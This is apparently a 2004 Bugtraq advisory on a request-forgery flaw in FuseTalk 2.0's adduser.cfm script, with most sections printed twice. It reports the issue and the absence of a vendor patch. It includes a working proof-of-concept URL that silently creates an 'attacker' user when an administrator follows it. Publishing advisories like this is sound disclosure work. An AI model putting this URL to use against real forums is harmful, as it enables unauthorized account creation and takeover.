E-Zone Media FuzeTalk AddUser.CFM Administrator Command Execution Vulnerability
BID:10276
Info
E-Zone Media FuzeTalk AddUser.CFM Administrator Command Execution Vulnerability
| Bugtraq ID: | 10276 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 05 2004 12:00AM |
| Updated: | May 05 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Stuart Jamieson <[email protected]>. |
| Vulnerable: |
e-Zone Media Inc. FuseTalk 2.0 |
| Not Vulnerable: | |
Discussion
E-Zone Media FuzeTalk AddUser.CFM Administrator Command Execution Vulnerability
It has been reported that FuseTalk is affected by an administrator command execution vulnerability in the adduser.cfm script. This issue is due to a failure of the application to properly validate the origin of user supplied data.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed by a forum administrator, the attacker supplied command would be carried out with the viewer's privileges. This would occur in the security context of the affected web site and may allow creation of arbitrary users, and other attacks.
It has been reported that FuseTalk is affected by an administrator command execution vulnerability in the adduser.cfm script. This issue is due to a failure of the application to properly validate the origin of user supplied data.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed by a forum administrator, the attacker supplied command would be carried out with the viewer's privileges. This would occur in the security context of the affected web site and may allow creation of arbitrary users, and other attacks.
Exploit / POC
E-Zone Media FuzeTalk AddUser.CFM Administrator Command Execution Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&[email protected]&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&[email protected]&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser
Solution / Fix
E-Zone Media FuzeTalk AddUser.CFM Administrator Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
E-Zone Media FuzeTalk AddUser.CFM Administrator Command Execution Vulnerability
References:
References:
- FuseTalk (e-Zone Media)
- Fuse Talk Vunerabilities (Stuart Jamieson
)